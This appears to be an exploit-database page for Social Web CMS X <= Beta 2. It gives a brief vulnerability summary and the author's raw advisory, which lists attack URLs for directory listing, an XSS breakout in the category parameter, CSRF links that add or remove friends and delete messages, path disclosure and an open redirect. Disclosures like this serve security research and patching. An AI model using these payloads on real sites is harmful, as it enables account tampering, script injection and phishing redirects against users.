header-logo
Suggest Exploit
vendor:
Social Web CMS
by:
cp77fk4r | Empty0pagE[Shift+2]gmail.com
8.8
CVSS
HIGH
Directory Listing, XSS, CSRF, Full Path Disclosure, User Redirection
79, 352, 352, 200, 601
CWE
Product Name: Social Web CMS
Affected Version From: X <= Beta 2
Affected Version To: X <= Beta 2
Patch Exists: NO
Related CWE: N/A
CPE: a:socialwebcms:social_web_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Social Web CMS X <= Beta 2 Vulnerabilities

Directory Listing: An attacker can view the directory structure of the application. XSS: An attacker can inject malicious JavaScript code into the application. CSRF: An attacker can add or remove friends, remove messages, and redirect users to malicious websites. Full Path Disclosure: An attacker can view the full path of the application. User Redirection: An attacker can redirect users to malicious websites.

Mitigation:

Implement input validation, use secure coding practices, use secure authentication and authorization, and use secure communication protocols.
Source

Exploit-DB raw data:

# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com/>
# Software Link: http://www.socialwebcms.com
# Version: X <= Beta 2
#
# Vulnz:
#
#[Directory Listing]
http://server/modules/
#
#
#[XSS]
http://server/index.php?category=%22%3E[XSS]
#
#
#[CSRF]
-Add friends:
 http://server/user/view/addfriend/login/[VALID_FRIEND]
 or
 http://server/user.php?login=[VALID_FRIEND]&view=addfriend
#
-Remove friends:
 http://server]/user/view/removefriend/login/[VALID_FRIEND]
 or
 http://server/user.php?login=[VALID_FRIEND]&view=removefriend
#
-Remove Messages:
 http://server/module.php?module=simple_messaging&view=delmsg&msg_id=[MESSAGE_ID]
#
#
#[Full Path Disclosure] (From Unlogged Browsing)
http://server/module.php?module=simple_messaging&view=delmsg&msg_id=
#
#[User Redirection]
http://server/module.php?module=simple_messaging&view=compose&to=[VALID_FRIEND]&return=[URL]
#
# EOF

Navigation

Suggest Exploit

Services By CQR